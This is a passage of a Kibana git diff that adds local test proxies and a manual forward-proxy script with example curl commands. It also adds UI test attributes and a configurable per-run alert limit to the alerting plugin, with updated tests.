http.IncomingMessage, res: http.ServerResponse) { + if (requireAuth) { + const auth = req.headers.authorization; + if (auth == null) { + res.setHeader('WWW-Authenticate', 'Basic'); + res.writeHead(401); + res.end('authorization required'); + return; + } + if (auth !== `Basic ${AuthB64}`) { + res.writeHead(403); + res.end('not authorized'); + return; + } + } + + res.writeHead(200); + res.end(ServerResponse); + } + + let server: http.Server | https.Server; + if (!useHttps) { + server = http.createServer(requestHandler); + } else { + server = https.createServer(TlsOptions, requestHandler); + } + server.unref(); + + const readySignal = createReadySignal(); + server.listen(port, 'localhost', () => { + readySignal.signal({ url, server }); + }); + + return readySignal.wait(); +} + +interface CreateProxyOptions { + useHttps: boolean; + requireAuth?: boolean; +} + +interface CreateProxyResult { + url: string; + server: http.Server | https.Server; +} + +type AuthenticateCallback = (err: null | Error, authenticated: boolean) => void; + +interface IAuthenticate { + authenticate(req: http.IncomingMessage, callback: AuthenticateCallback): void; +} + +async function createProxy(options: CreateProxyOptions): Promise { + const { useHttps, requireAuth = false } = options; + const port = await getPort(); + const url = getUrl(useHttps, requireAuth, port); + let proxyServer: http.Server | https.Server; + + if (!useHttps) { + proxyServer = http.createServer(); + } else { + proxyServer = https.createServer(TlsOptions); + } + proxyServer.unref(); + + proxySetup(proxyServer); + if (requireAuth) { + (proxyServer as unknown as IAuthenticate).authenticate = (req, callback) => { + const auth = req.headers['proxy-authorization']; + callback(null, auth === `Basic ${AuthB64}`); + }; + } + + const readySignal = createReadySignal(); + + proxyServer.listen(port, 'localhost', () => { + readySignal.signal({ server: proxyServer, url }); + }); + + return readySignal.wait(); +} + +function getUrl(useHttps: boolean, requiresAuth: boolean, port: number) { + return `http${useHttps ? 's' : ''}://${requiresAuth ? `${Auth}@` : ''}localhost:${port}`; +} + +const BaseActionsConfig: ActionsConfig = { + allowedHosts: ['*'], + enabledActionTypes: ['*'], + preconfiguredAlertHistoryEsIndex: false, + preconfigured: {}, + proxyUrl: undefined, + proxyHeaders: undefined, + proxyRejectUnauthorizedCertificates: true, + ssl: { + proxyVerificationMode: 'full', + verificationMode: 'full', + }, + proxyBypassHosts: undefined, + proxyOnlyHosts: undefined, + rejectUnauthorized: true, + maxResponseContentLength: ByteSizeValue.parse('1mb'), + responseTimeout: momentDuration(1000 * 30), + customHostSettings: undefined, + cleanupFailedExecutionsTask: { + enabled: true, + cleanupInterval: schema.duration().validate('5m'), + idleInterval: schema.duration().validate('1h'), + pageSize: 100, + }, +}; + +function getACUfromConfig(config: Partial = {}): ActionsConfigurationUtilities { + const resolvedConfig = resolveCustomHosts(logger, { ...BaseActionsConfig, ...config }); + return getActionsConfigurationUtilities(resolvedConfig); +} diff --git a/x-pack/plugins/actions/server/manual_tests/forward_proxy.js b/x-pack/plugins/actions/server/manual_tests/forward_proxy.js index e562d3edabdb6..17475866b3111 100644 --- a/x-pack/plugins/actions/server/manual_tests/forward_proxy.js +++ b/x-pack/plugins/actions/server/manual_tests/forward_proxy.js @@ -6,108 +6,151 @@ */ /* -This module implements two forward http proxies, http on 8080 and https on 8443, -which can be used with the config xpack.actions.proxyUrl to emulate customers -using forward proxies with Kibana actions. You can use either the http or https -versions, both can forward proxy http and https traffic: - - xpack.actions.proxyUrl: http://localhost:8080 - OR - xpack.actions.proxyUrl: https://localhost:8443 +Starts http and https proxies to use to test actions within Kibana or with curl. -When using the https-based version, you may need to set the following option -as well: +Assumes you have elasticsearch running on https://elastic:changeme@localhost:9200, +otherwise expect 500 responses from those requests. All other requests should +work as expected. - xpack.actions.rejectUnauthorized: false +# start 4 proxies: -If the server you are connecting to via the proxy is https and has self-signed -certificates, you'll also need to set +node x-pack/plugins/actions/server/manual_tests/forward_proxy.js http-8080-open http-8081-auth https-8443-open https-8444-auth - xpack.actions.proxyRejectUnauthorizedCertificates: false -*/ +# issue some requests through the proxies -const HTTP_PORT = 8080; -const HTTPS_PORT = 8443; +curl -k --no-alpn -o /dev/null --proxy-insecure -x http://127.0.0.1:8080 http://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x http://127.0.0.1:8080 https://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x https://127.0.0.1:8443 http://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x https://127.0.0.1:8443 https://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x http://127.0.0.1:8080 https://elastic:changeme@localhost:9200; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x https://127.0.0.1:8443 https://elastic:changeme@localhost:9200; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x http://127.0.0.1:8081 --proxy-user elastic:changeme http://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x http://127.0.0.1:8081 --proxy-user elastic:changeme https://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x https://127.0.0.1:8444 --proxy-user elastic:changeme http://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x https://127.0.0.1:8444 --proxy-user elastic:changeme https://www.example.com; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x http://127.0.0.1:8081 --proxy-user elastic:changeme https://elastic:changeme@localhost:9200; \ +curl -k --no-alpn -o /dev/null --proxy-insecure -x https://127.0.0.1:8444 --proxy-user elastic:changeme https://elastic:changeme@localhost:9200; \ +echo done - you should run all the lines above as one command -// starts http and https proxies to use to test actions within Kibana +*/ const fs = require('fs'); -const net = require('net'); -const url = require('url'); +const path = require('path'); const http = require('http'); const https = require('https'); -const httpProxy = require('http-proxy'); +const proxySetup = require('proxy'); + +const PROGRAM = path.basename(__filename).replace(/.js$/, ''); +const CertDir = path.resolve(__dirname, '../../../../../packages/kbn-dev-utils/certs'); -const httpsOptions = { - key: fs.readFileSync('packages/kbn-dev-utils/certs/kibana.key', 'utf8'), - cert: fs.readFileSync('packages/kbn-dev-utils/certs/kibana.crt', 'utf8'), +const Auth = 'elastic:changeme'; +const AuthB64 = Buffer.from(Auth).toString('base64'); + +const HttpsOptions = { + key: fs.readFileSync(path.join(CertDir, 'kibana.key'), 'utf8'), + cert: fs.readFileSync(path.join(CertDir, 'kibana.crt'), 'utf8'), }; -const proxy = httpProxy.createServer(); +async function main() { + const args = process.argv.slice(2); + if (args.length === 0) { + help(); + process.exit(1); + } -createServer('http', HTTP_PORT); -createServer('https', HTTPS_PORT); + const specs = args.map(argToSpec); + for (const spec of specs) { + const { protocol, port, auth } = spec; + createServer(protocol, port, auth); + } +} -function createServer(protocol, port) { - let httpServer; +/** @type { (protocol: string, port: number, auth: boolean) => Promise } */ +async function createServer(protocol, port, auth) { + let proxyServer; if (protocol === 'http') { - httpServer = http.createServer(); + proxyServer = http.createServer(); } else { - httpServer = https.createServer(httpsOptions); + proxyServer = https.createServer(HttpsOptions); } - httpServer.on('request', httpRequest); - httpServer.on('connect', httpsRequest); - httpServer.listen(port); - log(`proxy server started: ${protocol}:/localhost:${port}`); - - // handle http requests - function httpRequest(req, res) { - log(`${protocol} server: request for: ${req.url}`); - const parsedUrl = url.parse(req.url); - if (parsedUrl.hostname == null) { - res.writeHead(200, { 'Content-Type': 'text/plain' }); - res.end('this is a proxy server'); - return; - } - const target = parsedUrl.protocol + '//' + parsedUrl.hostname; - proxy.web(req, res, { target: target, secure: false }); + proxySetup(proxyServer); + + let authLabel = ''; + if (auth) { + authLabel = `${Auth}@`; + proxyServer.authenticate = (req, callback) => { + const auth = req.headers['proxy-authorization']; + callback(null, auth === `Basic ${AuthB64}`); + }; } - // handle https requests - // see: https://nodejs.org/dist/latest-v14.x/docs/api/http.html#http_event_connect - function httpsRequest(req, socket, head) { - log(`${protocol} proxy server: request for target: https://${req.url}`); - const serverUrl = url.parse('https://' + req.url); - const serverSocket = net.connect(serverUrl.port, serverUrl.hostname, () => { - socket.write('HTTP/1.1 200 Connection Established\r\nProxy-agent: Node-Proxy\r\n\r\n'); - serverSocket.write(head); - serverSocket.pipe(socket); - socket.pipe(serverSocket); - }); - socket.on('error', (err) => { - log(`error on socket to proxy: ${err}`); - socket.destroy(); - serverSocket.destroy(); - }); - serverSocket.on('error', (err) => { - log(`error on socket to target: ${err}`); - socket.destroy(); - serverSocket.destroy(); - }); + const serverLabel = `${protocol}://${authLabel}localhost:${port}`; + proxyServer.listen(port, 'localhost', () => { + console.log(`proxy server started on ${serverLabel}`); + }); +} + +/* convert 'proto-port-auth' into object with shape shown below */ +/** @type { (arg: string) => void | { protocol: string, port: number, auth: boolean } } */ +function argToSpec(arg) { + const parts = arg.split('-'); + if (parts.length < 2) { + return logError(`invalid spec: ${arg}`); } + + const [protocol, portString, authString] = parts; + + if (!protocol) return logError(`empty protocol in '${arg}'`); + if (protocol !== 'http' && protocol !== 'https') + return logError(`invalid protocol in '${arg}': '${protocol}'`); + + if (!portString) return logError(`empty port in '${arg}'`); + const port = Number.parseInt(portString, 10); + if (isNaN(port)) return logError(`invalid port in '${arg}': ${portString}`); + + let auth; + if (!authString) { + auth = false; + } else { + if (authString !== 'auth' && authString !== 'open') + return logError(`invalid auth in '${arg}': '${authString}'`); + auth = authString === 'auth'; + } + + return { protocol, port, auth }; } +/** @type { (message: string) => void } */ function log(message) { console.log(`${new Date().toISOString()} - ${message}`); } -/* -Test with: +/** @type { (message: string) => void } */ +function logError(message) { + log(message); + process.exit(1); +} -curl -v -k --proxy-insecure -x http://127.0.0.1:8080 http://www.google.com -curl -v -k --proxy-insecure -x http://127.0.0.1:8080 https://www.google.com -curl -v -k --proxy-insecure -x https://127.0.0.1:8443 http://www.google.com -curl -v -k --proxy-insecure -x https://127.0.0.1:8443 https://www.google.com -*/ +main(); + +function help() { + console.log(`${PROGRAM} - create http proxies to test connectors with`); + console.log(`usage:`); + console.log(` ${PROGRAM} spec spec spec ...`); + console.log(``); + console.log(`options:`); + console.log(` - none yet`); + console.log(``); + console.log(`parameters:`); + console.log(` spec: spec is a 3-part token, separated by '-' chars`); + console.log(` [proto]-[port]-[auth]`); + console.log(` proto - 'http' or 'https'`); + console.log(` port - port to open the proxy on`); + console.log(` auth - 'auth' or 'open' (auth expects user/pass elastic:change)`); + console.log(``); + console.log(`example:`); + console.log(` ${PROGRAM} {options} http-8080-open https-8443-open`); + console.log(` `); +} diff --git a/x-pack/plugins/aiops/public/components/document_count_content/document_count_chart/document_count_chart.tsx b/x-pack/plugins/aiops/public/components/document_count_content/document_count_chart/document_count_chart.tsx index 79f5494b419ca..4a7d4dd583de5 100644 --- a/x-pack/plugins/aiops/public/components/document_count_content/document_count_chart/document_count_chart.tsx +++ b/x-pack/plugins/aiops/public/components/document_count_content/document_count_chart/document_count_chart.tsx @@ -33,6 +33,15 @@ import { useAiOpsKibana } from '../../../kibana_context'; import { BrushBadge } from './brush_badge'; +declare global { + interface Window { + /** + * Flag used to enable debugState on elastic charts + */ + _echDebugStateFlag?: boolean; + } +} + export interface DocumentCountChartPoint { time: number | string; value: number; @@ -271,7 +280,7 @@ export const DocumentCountChart: FC = ({ return ( <> {isBrushVisible && ( -
+
= ({ }} theme={chartTheme} baseTheme={chartBaseTheme} + debugState={window._echDebugStateFlag ?? false} /> = ({ {clearSelectionLabel} diff --git a/x-pack/plugins/aiops/public/components/explain_log_rate_spikes/explain_log_rate_spikes_analysis.tsx b/x-pack/plugins/aiops/public/components/explain_log_rate_spikes/explain_log_rate_spikes_analysis.tsx index c9b74a634001e..4c99c3bb9279d 100644 --- a/x-pack/plugins/aiops/public/components/explain_log_rate_spikes/explain_log_rate_spikes_analysis.tsx +++ b/x-pack/plugins/aiops/public/components/explain_log_rate_spikes/explain_log_rate_spikes_analysis.tsx @@ -112,7 +112,7 @@ export const ExplainLogRateSpikesAnalysis: FC const showSpikeAnalysisTable = data?.changePoints.length > 0; return ( - <> +
{!isRunning && !showSpikeAnalysisTable && ( selectedChangePoint={selectedChangePoint} /> )} - +
); }; diff --git a/x-pack/plugins/aiops/public/components/spike_analysis_table/spike_analysis_table.tsx b/x-pack/plugins/aiops/public/components/spike_analysis_table/spike_analysis_table.tsx index 4b7d2bb1d0597..6ae778e48e3e0 100644 --- a/x-pack/plugins/aiops/public/components/spike_analysis_table/spike_analysis_table.tsx +++ b/x-pack/plugins/aiops/public/components/spike_analysis_table/spike_analysis_table.tsx @@ -56,6 +56,7 @@ export const SpikeAnalysisTable: FC = ({ const columns: Array> = [ { + 'data-test-subj': 'aiopsSpikeAnalysisTableColumnFieldName', field: 'fieldName', name: i18n.translate( 'xpack.aiops.correlations.failedTransactions.correlationsTable.fieldNameLabel', @@ -64,6 +65,7 @@ export const SpikeAnalysisTable: FC = ({ sortable: true, }, { + 'data-test-subj': 'aiopsSpikeAnalysisTableColumnFieldValue', field: 'fieldValue', name: i18n.translate( 'xpack.aiops.correlations.failedTransactions.correlationsTable.fieldValueLabel', @@ -73,6 +75,7 @@ export const SpikeAnalysisTable: FC = ({ sortable: true, }, { + 'data-test-subj': 'aiopsSpikeAnalysisTableColumnLogRate', width: NARROW_COLUMN_WIDTH, field: 'pValue', name: ( @@ -105,6 +108,7 @@ export const SpikeAnalysisTable: FC = ({ sortable: false, }, { + 'data-test-subj': 'aiopsSpikeAnalysisTableColumnPValue', width: NARROW_COLUMN_WIDTH, field: 'pValue', name: ( @@ -131,6 +135,7 @@ export const SpikeAnalysisTable: FC = ({ sortable: true, }, { + 'data-test-subj': 'aiopsSpikeAnalysisTableColumnImpact', width: NARROW_COLUMN_WIDTH, field: 'pValue', name: ( @@ -210,6 +215,7 @@ export const SpikeAnalysisTable: FC = ({ return ( = ({ sorting={sorting as EuiTableSortingType} rowProps={(changePoint) => { return { + 'data-test-subj': `aiopsSpikeAnalysisTableRow row-${changePoint.fieldName}-${changePoint.fieldValue}`, onClick: () => { if (onPinnedChangePoint) { onPinnedChangePoint(changePoint); diff --git a/x-pack/plugins/alerting/common/rule.ts b/x-pack/plugins/alerting/common/rule.ts index cfd93f475b883..1514de7b95209 100644 --- a/x-pack/plugins/alerting/common/rule.ts +++ b/x-pack/plugins/alerting/common/rule.ts @@ -45,6 +45,7 @@ export enum RuleExecutionStatusErrorReasons { export enum RuleExecutionStatusWarningReasons { MAX_EXECUTABLE_ACTIONS = 'maxExecutableActions', + MAX_ALERTS = 'maxAlerts', } export interface RuleExecutionStatus { diff --git a/x-pack/plugins/alerting/server/alert/create_alert_factory.test.ts b/x-pack/plugins/alerting/server/alert/create_alert_factory.test.ts index c9505d5f838e2..9b8b95e8af36f 100644 --- a/x-pack/plugins/alerting/server/alert/create_alert_factory.test.ts +++ b/x-pack/plugins/alerting/server/alert/create_alert_factory.test.ts @@ -29,6 +29,7 @@ describe('createAlertFactory()', () => { const alertFactory = createAlertFactory({ alerts: {}, logger, + maxAlerts: 1000, }); const result = alertFactory.create('1'); expect(result).toMatchInlineSnapshot(` @@ -51,6 +52,7 @@ describe('createAlertFactory()', () => { '1': alert, }, logger, + maxAlerts: 1000, }); const result = alertFactory.create('1'); expect(result).toMatchInlineSnapshot(` @@ -73,6 +75,7 @@ describe('createAlertFactory()', () => { const alertFactory = createAlertFactory({ alerts, logger, + maxAlerts: 1000, }); alertFactory.create('1'); expect(alerts).toMatchInlineSnapshot(` @@ -85,10 +88,30 @@ describe('createAlertFactory()', () => { `); }); + test('throws error and sets flag when more alerts are created than allowed', () => { + const alertFactory = createAlertFactory({ + alerts: {}, + logger, + maxAlerts: 3, + }); + + expect(alertFactory.hasReachedAlertLimit()).toBe(false); + alertFactory.create('1'); + alertFactory.create('2'); + alertFactory.create('3'); + + expect(() => { + alertFactory.create('4'); + }).toThrowErrorMatchingInlineSnapshot(`"Rule reported more than 3 alerts."`); + + expect(alertFactory.hasReachedAlertLimit()).toBe(true); + }); + test('throws error when creating alerts after done() is called', () => { const alertFactory = createAlertFactory({ alerts: {}, logger, + maxAlerts: 1000, }); const result = alertFactory.create('1'); expect(result).toEqual({ @@ -127,6 +150,7 @@ describe('createAlertFactory()', () => { alerts: {}, logger, canSetRecoveryContext: true, + maxAlerts: 1000, }); const result = alertFactory.create('1'); expect(result).toEqual({ @@ -149,6 +173,7 @@ describe('createAlertFactory()', () => { const alertFactory = createAlertFactory({ alerts: {}, logger, + maxAlerts: 1000, canSetRecoveryContext: true, }); const result = alertFactory.create('1'); @@ -171,6 +196,7 @@ describe('createAlertFactory()', () => { const alertFactory = createAlertFactory({ alerts: {}, logger, + maxAlerts: 1000, canSetRecoveryContext: true, }); const result = alertFactory.create('1'); @@ -192,6 +218,7 @@ describe('createAlertFactory()', () => { const alertFactory = createAlertFactory({ alerts: {}, logger, + maxAlerts: 1000, canSetRecoveryContext: false, }); const result = alertFactory.create('1'); diff --git a/x-pack/plugins/alerting/server/alert/create_alert_factory.ts b/x-pack/plugins/alerting/server/alert/create_alert_factory.ts index 5a9dad5cdada8..158926a19d782 100644 --- a/x-pack/plugins/alerting/server/alert/create_alert_factory.ts +++ b/x-pack/plugins/alerting/server/alert/create_alert_factory.ts @@ -25,6 +25,7 @@ export interface CreateAlertFactoryOpts< > { alerts: Record>; logger: Logger; + maxAlerts: number; canSetRecoveryContext?: boolean; } @@ -32,21 +33,40 @@ export function createAlertFactory< State extends AlertInstanceState, Context extends AlertInstanceContext, ActionGroupIds extends string ->({ alerts, logger, canSetRecoveryContext = false }: CreateAlertFactoryOpts) { +>({ + alerts, + logger, + maxAlerts, + canSetRecoveryContext = false, +}: CreateAlertFactoryOpts) { // Keep track of which alerts we started with so we can determine which have recovered const originalAlerts = cloneDeep(alerts); + + // Number of alerts reported + let numAlertsCreated = 0; + + // Whether the number of alerts reported has reached max allowed + let hasReachedAlertLimit = false; + let isDone = false; return { create: (id: string): PublicAlert => { if (isDone) { throw new Error(`Can't create new alerts after calling done() in AlertsFactory.`); } + + if (numAlertsCreated++ >= maxAlerts) { + hasReachedAlertLimit = true; + throw new Error(`Rule reported more than ${maxAlerts} alerts.`); + } + if (!alerts[id]) { alerts[id] = new Alert(id); } return alerts[id]; }, + hasReachedAlertLimit: (): boolean => hasReachedAlertLimit, done: (): AlertFactoryDoneUtils => { isDone = true; return { @@ -59,8 +79,12 @@ export function createAlertFactory< } const { recoveredAlerts } = processAlerts( - alerts, - originalAlerts + { + alerts, + existingAlerts: originalAlerts, + hasReachedAlertLimit, + alertLimit: maxAlerts, + } ); return Object.keys(recoveredAlerts ?? {}).map( (alertId: string) => recoveredAlerts[alertId] diff --git a/x-pack/plugins/alerting/server/config.test.ts b/x-pack/plugins/alerting/server/config.test.ts index 08ef06921a143..ec6f2f6565d67 100644 --- a/x-pack/plugins/alerting/server/config.test.ts +++ b/x-pack/plugins/alerting/server/config.test.ts @@ -30,6 +30,9 @@ describe('config validation', () => { "actions": Object { "max": 100000, }, + "alerts": Object { + "max": 1000, + }, }, }, } diff --git a/x-pack/plugins/alerting/server/config.ts b/x-pack/plugins/alerting/server/config.ts index 4f283917a460a..f6becbf192b05 100644 --- a/x-pack/plugins/alerting/server/config.ts +++ b/x-pack/plugins/alerting/server/config.ts @@ -43,6 +43,9 @@ const rulesSchema = schema.object({ max: schema.number({ defaultValue: 100000, max: 100000 }), connectorTypeOverrides: schema.maybe(schema.arrayOf(connectorTypeSchema)), }), + alerts: schema.object({ + max: schema.number({ defaultValue: 1000 }), + }), ruleTypeOverrides: schema.maybe(schema.arrayOf(ruleTypeSchema)), }), }); diff --git a/x-pack/plugins/alerting/server/constants/translations.ts b/x-pack/plugins/alerting/server/constants/translations.ts index ee1d711b56f8d..15442cf8efc57 100644 --- a/x-pack/plugins/alerting/server/constants/translations.ts +++ b/x-pack/plugins/alerting/server/constants/translations.ts @@ -17,6 +17,10 @@ export const translations = { 'The maximum number of actions for this rule type was reached; excess actions were not triggered.', } ), + maxAlerts: i18n.translate('xpack.alerting.taskRunner.warning.maxAlerts', { + defaultMessage: + 'Rule reported more than the maximum number of alerts in a single run. Alerts may be missed and recovery notifications may be delayed', + }), }, }, }; diff --git a/x-pack/plugins/alerting/server/lib/alerting_event_logger/alerting_event_logger.test.ts b/x-pack/plugins/alerting/server/lib/alerting_event_logger/alerting_event_logger.test.ts index 766e2c77531f3..74fe762f87b3a 100644 --- a/x-pack/plugins/alerting/server/lib/alerting_event_logger/alerting_event_logger.test.ts +++ b/x-pack/plugins/alerting/server/lib/alerting_event_logger/alerting_event_logger.test.ts @@ -653,6 +653,7 @@ describe('AlertingEventLogger', () => { numSearches: 6, esSearchDurationMs: 3300, totalSearchDurationMs: 10333, + hasReachedAlertLimit: false, triggeredActionsStatus: ActionsCompletion.COMPLETE, }, }); diff --git a/x-pack/plugins/alerting/server/lib/get_rule_task_timeout.test.ts b/x-pack/plugins/alerting/server/lib/get_rule_task_timeout.test.ts index 9336c380c1742..59d4260261ebb 100644 --- a/x-pack/plugins/alerting/server/lib/get_rule_task_timeout.test.ts +++ b/x-pack/plugins/alerting/server/lib/get_rule_task_timeout.test.ts @@ -37,6 +37,7 @@ const configWithoutTimeout = { ...config, run: { actions: { max: 1000 }, + alerts: { max: 1000 }, }, }; diff --git a/x-pack/plugins/alerting/server/lib/process_alerts.test.ts b/x-pack/plugins/alerting/server/lib/process_alerts.test.ts index a242ac471ad11..dcf13bdc4f7a1 100644 --- a/x-pack/plugins/alerting/server/lib/process_alerts.test.ts +++ b/x-pack/plugins/alerting/server/lib/process_alerts.test.ts @@ -30,13 +30,13 @@ describe('processAlerts', () => { const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '2': existingAlert1, '3': existingAlert2, }; const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '1': newAlert, }; @@ -44,8 +44,14 @@ describe('processAlerts', () => { updatedAlerts['2'].scheduleActions('default', { foo: '1' }); updatedAlerts['3'].scheduleActions('default', { foo: '2' }); - // @ts-expect-error - const { newAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { newAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(newAlerts).toEqual({ '1': newAlert }); }); @@ -56,13 +62,13 @@ describe('processAlerts', () => { const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('3'); const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('4'); - const originalAlerts = { + const existingAlerts = { '3': existingAlert1, '4': existingAlert2, }; const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '1': newAlert1, '2': newAlert2, }; @@ -75,8 +81,14 @@ describe('processAlerts', () => { expect(newAlert1.getState()).toStrictEqual({}); expect(newAlert2.getState()).toStrictEqual({}); - // @ts-expect-error - const { newAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { newAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(newAlerts).toEqual({ '1': newAlert1, '2': newAlert2 }); @@ -106,13 +118,13 @@ describe('processAlerts', () => { const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '2': existingAlert1, '3': existingAlert2, }; const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '1': newAlert, }; @@ -120,8 +132,14 @@ describe('processAlerts', () => { updatedAlerts['2'].scheduleActions('default', { foo: '1' }); updatedAlerts['3'].scheduleActions('default', { foo: '2' }); - // @ts-expect-error - const { activeAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { activeAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(activeAlerts).toEqual({ '1': updatedAlerts['1'], @@ -135,15 +153,15 @@ describe('processAlerts', () => { const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '2': existingAlert1, '3': existingAlert2, }; - originalAlerts['2'].replaceState({ start: '1969-12-30T00:00:00.000Z', duration: 33000 }); - originalAlerts['3'].replaceState({ start: '1969-12-31T07:34:00.000Z', duration: 23532 }); + existingAlerts['2'].replaceState({ start: '1969-12-30T00:00:00.000Z', duration: 33000 }); + existingAlerts['3'].replaceState({ start: '1969-12-31T07:34:00.000Z', duration: 23532 }); const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '1': newAlert, }; @@ -151,8 +169,14 @@ describe('processAlerts', () => { updatedAlerts['2'].scheduleActions('default', { foo: '1' }); updatedAlerts['3'].scheduleActions('default', { foo: '2' }); - // @ts-expect-error - const { activeAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { activeAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(activeAlerts).toEqual({ '1': updatedAlerts['1'], @@ -184,13 +208,13 @@ describe('processAlerts', () => { const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '2': existingAlert1, '3': existingAlert2, }; const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '1': newAlert, }; @@ -198,8 +222,14 @@ describe('processAlerts', () => { updatedAlerts['2'].scheduleActions('default', { foo: '1' }); updatedAlerts['3'].scheduleActions('default', { foo: '2' }); - // @ts-expect-error - const { activeAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { activeAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(activeAlerts).toEqual({ '1': updatedAlerts['1'], @@ -231,23 +261,23 @@ describe('processAlerts', () => { const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '2': existingAlert1, '3': existingAlert2, }; - originalAlerts['2'].replaceState({ + existingAlerts['2'].replaceState({ stateField1: 'xyz', start: '1969-12-30T00:00:00.000Z', duration: 33000, }); - originalAlerts['3'].replaceState({ + existingAlerts['3'].replaceState({ anotherState: true, start: '1969-12-31T07:34:00.000Z', duration: 23532, }); const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '1': newAlert, }; @@ -255,8 +285,14 @@ describe('processAlerts', () => { updatedAlerts['2'].scheduleActions('default', { foo: '1' }); updatedAlerts['3'].scheduleActions('default', { foo: '2' }); - // @ts-expect-error - const { activeAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { activeAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(activeAlerts).toEqual({ '1': updatedAlerts['1'], @@ -294,18 +330,24 @@ describe('processAlerts', () => { const activeAlert = new Alert<{}, {}, DefaultActionGroupId>('1'); const recoveredAlert = new Alert<{}, {}, DefaultActionGroupId>('2'); - const originalAlerts = { + const existingAlerts = { '1': activeAlert, '2': recoveredAlert, }; - const updatedAlerts = cloneDeep(originalAlerts); + const updatedAlerts = cloneDeep(existingAlerts); updatedAlerts['1'].scheduleActions('default', { foo: '1' }); updatedAlerts['2'].setContext({ foo: '2' }); - // @ts-expect-error - const { recoveredAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { recoveredAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(recoveredAlerts).toEqual({ '2': updatedAlerts['2'] }); }); @@ -314,19 +356,25 @@ describe('processAlerts', () => { const activeAlert = new Alert<{}, {}, DefaultActionGroupId>('1'); const notRecoveredAlert = new Alert<{}, {}, DefaultActionGroupId>('2'); - const originalAlerts = { + const existingAlerts = { '1': activeAlert, }; const updatedAlerts = { - ...cloneDeep(originalAlerts), + ...cloneDeep(existingAlerts), '2': notRecoveredAlert, }; updatedAlerts['1'].scheduleActions('default', { foo: '1' }); - // @ts-expect-error - const { recoveredAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { recoveredAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(recoveredAlerts).toEqual({}); }); @@ -336,20 +384,26 @@ describe('processAlerts', () => { const recoveredAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const recoveredAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '1': activeAlert, '2': recoveredAlert1, '3': recoveredAlert2, }; - originalAlerts['2'].replaceState({ start: '1969-12-30T00:00:00.000Z', duration: 33000 }); - originalAlerts['3'].replaceState({ start: '1969-12-31T07:34:00.000Z', duration: 23532 }); + existingAlerts['2'].replaceState({ start: '1969-12-30T00:00:00.000Z', duration: 33000 }); + existingAlerts['3'].replaceState({ start: '1969-12-31T07:34:00.000Z', duration: 23532 }); - const updatedAlerts = cloneDeep(originalAlerts); + const updatedAlerts = cloneDeep(existingAlerts); updatedAlerts['1'].scheduleActions('default', { foo: '1' }); - // @ts-expect-error - const { recoveredAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { recoveredAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + 